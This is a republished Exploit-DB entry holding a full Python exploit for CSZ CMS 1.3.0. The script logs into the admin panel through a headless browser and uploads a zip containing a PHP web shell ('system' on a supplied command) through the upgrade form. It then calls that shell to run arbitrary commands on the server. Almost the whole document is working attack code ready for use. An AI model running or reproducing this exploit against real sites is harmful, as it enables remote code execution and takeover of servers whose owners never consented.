8
[webapps] CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution
source link: https://www.exploit-db.com/exploits/51863
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CSZ CMS Version 1.3.0 - Authenticated Remote Command Execution
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS
import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO
email = "[email protected]"
password = "password"
class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)
def entryy():
x = color_random[0] + """
╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯
<< CSZ CMS Version 1.3.0 RCE >>
<< CODED BY TMRSWRR >>
<< GITHUB==>capture0x >>
\n"""
for c in x:
print(c, end='')
sys.stdout.flush()
sleep(0.0045)
oo = " " * 6 + 29 * "░⣿" + "\n\n"
for c in oo:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)
tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
for c in tt:
print(colors.CWHITE + c, end='')
sys.stdout.flush()
sleep(0.0065)
xx = " " * 6 + 29 * "░⣿" + "\n\n"
for c in xx:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)
def check_geckodriver():
current_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(current_directory, 'geckodriver')
if not os.path.isfile(geckodriver_path):
red = "\033[91m"
reset = "\033[0m"
print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
user_input = input("Would you like to download it now? (yes/no): ").lower()
if user_input == 'yes':
download_geckodriver(current_directory)
else:
print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
sys.exit(1)
def download_geckodriver(directory):
print("[*] Detecting OS and architecture...")
os_name = platform.system().lower()
arch, _ = platform.architecture()
if os_name == "linux":
os_name = "linux"
arch = "64" if arch == "64bit" else "32"
elif os_name == "darwin":
os_name = "macos"
arch = "aarch64" if platform.processor() == "arm" else ""
elif os_name == "windows":
os_name = "win"
arch = "64" if arch == "64bit" else "32"
else:
print("[!] Unsupported operating system.")
sys.exit(1)
geckodriver_version = "v0.33.0"
geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
ext = "zip" if os_name == "win" else "tar.gz"
url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"
print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
response = requests.get(url, stream=True)
if response.status_code == 200:
print("[*] Extracting GeckoDriver...")
if ext == "tar.gz":
with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
tar.extractall(path=directory)
else:
with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
zip_ref.extractall(directory)
print("[+] GeckoDriver downloaded and extracted successfully.")
else:
print("[!] Failed to download GeckoDriver.")
sys.exit(1)
def create_zip_file(php_filename, zip_filename, php_code):
try:
with open(php_filename, 'w') as file:
file.write(php_code)
with zipfile.ZipFile(zip_filename, 'w') as zipf:
zipf.write(php_filename)
print("[+] Zip file created successfully.")
os.remove(php_filename)
return zip_filename
except Exception as e:
print(f"[!] Error creating zip file: {e}")
sys.exit(1)
def main(base_url, command):
if not base_url.endswith('/'):
base_url += '/'
zip_filename = None
check_geckodriver()
try:
firefox_options = FirefoxOptions()
firefox_options.add_argument("--headless")
script_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(script_directory, 'geckodriver')
service = FirefoxService(executable_path=geckodriver_path)
driver = webdriver.Firefox(service=service, options=firefox_options)
print("[*] Exploit initiated.")
# Login
driver.get(base_url + "admin/login")
print("[*] Accessing login page...")
driver.find_element(By.NAME, "email").send_keys(f"{email}")
driver.find_element(By.NAME, "password").send_keys(f"{password}")
driver.find_element(By.ID, "login_submit").click()
print("[*] Credentials submitted...")
try:
error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
if error_message.is_displayed():
print("[!] Login failed: Invalid credentials.")
driver.quit()
sys.exit(1)
except NoSuchElementException:
print("[+] Login successful.")
# File creation
print("[*] Preparing exploit files...")
php_code = f"<?php echo system('{command}'); ?>"
zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)
driver.get(base_url + "admin/upgrade")
print("[*] Uploading exploit payload...")
file_input = driver.find_element(By.ID, "file_upload")
file_input.send_keys(os.path.join(os.getcwd(), zip_filename))
# Uploading
driver.find_element(By.ID, "submit").click()
WebDriverWait(driver, 10).until(EC.alert_is_present())
alert = driver.switch_to.alert
alert.accept()
# Exploit result
exploit_url = base_url + "exploit.php"
response = requests.get(exploit_url)
print(f"[+] Exploit response:\n\n{response.text}")
except Exception as e:
print(f"[!] Error: {e}")
finally:
driver.quit()
if zip_filename and os.path.exists(zip_filename):
os.remove(zip_filename)
if __name__ == "__main__":
entryy()
if len(sys.argv) < 3:
print("Usage: python script.py [BASE_URL] [COMMAND]")
else:
main(sys.argv[1], sys.argv[2])
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK